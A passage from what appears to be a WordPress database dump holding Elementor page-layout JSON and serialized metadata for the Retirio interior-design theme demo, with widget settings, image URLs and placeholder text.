tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3337,4781,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3338,4781,'_elementor_pro_version','3.8.1'),(3339,4781,'_elementor_css','a:6:{s:4:\"time\";i:1685012020;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3340,4782,'_wp_page_template','elementor_header_footer'),(3341,4782,'_elementor_edit_mode','builder'),(3342,4782,'_elementor_template_type','wp-page'),(3343,4782,'_elementor_version','3.8.1'),(3344,4782,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"